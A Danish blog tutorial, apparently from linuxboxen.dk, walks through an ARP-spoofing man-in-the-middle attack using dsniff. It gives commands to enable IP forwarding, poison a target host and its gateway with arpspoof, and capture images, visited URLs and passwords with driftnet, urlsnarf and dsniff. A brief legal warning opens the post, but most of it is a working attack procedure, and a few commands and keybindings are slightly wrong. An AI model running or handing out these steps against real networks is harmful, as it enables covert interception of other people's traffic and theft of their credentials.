Backtrack

Med dsniff kan du se/sniffe andre computers netværkstrafik.

Jeg vil først advare om dette. Du må aldrig sniffe på andres netværk.  man straffes for forsøg på indtrængen. Ifølge straffelovens §21 omfatter “forsøg” også forberedelser til en forbrydelse. Så lad vær med det. 

Så lad os komme igang. 

For at bruge funktionen skal du bruge nogle programmer. Så vi starter med at installere dsniff.

$ sudo apt install dsniff

Start med at åbne en bash shell

check af ip forward er aktiv med

$ cat /proc/sys/net/ipv4/ip_forward

Skal give 1. Hvis den ikke gør sættes det med med en echo som vist her.

$ sudo echo 1 >> /proc/sys/net/ipv4/ip_forward

Der efter. start screen som root.

tryk ctrl + a  derefter pipe tegnet | dette vil lave screen split

derefter crtl + a + stort S for split igen.

i første terminal start

Den xxx.xxx.xxx.xxx Er ip som den host du vil lave sniffing på.

yyy.yyy.yyy.yyy er den host du vil sniffe på’s gateway

$ sudo arpspoof -i eth0 -t xxx.xxx.xxx.xxx yyy.yyy.yyy.yyy

Skift terminal med ctrl + a + tab

Og ctrl + a

og ctrl + a + c for ny terminal

Og i næste terminal.

$ sudo arpspoof -i eth0 -t yyy.yyy.yyy.yyy (sniff host's gateway) xxx.xxx.xxx.xxx (den host du vil sniffe på) 

Og ctrl + a for ny tab

og ctrl + c for ny terminal

$ sudo drifnet -i eth0

drifnet er for snifff af billedere fra browser.

$ urlsnarf -i eth0 for url sniffer

samt dsniff – password sniffer

$ dsniff -i eth0

For at slutte af med

$ killall arpspoof

Author:

Jeg er en professionel system administrator og grundlægger af linuxboxen.dk Jeg er en ivrig Linux-elsker og open source-entusiast. Jeg bruger Ubuntu og tror på at dele viden. Bortset fra Linux, elsker musik og dyr. Jeg er en stor fan af Dire straits.

Skriv et svar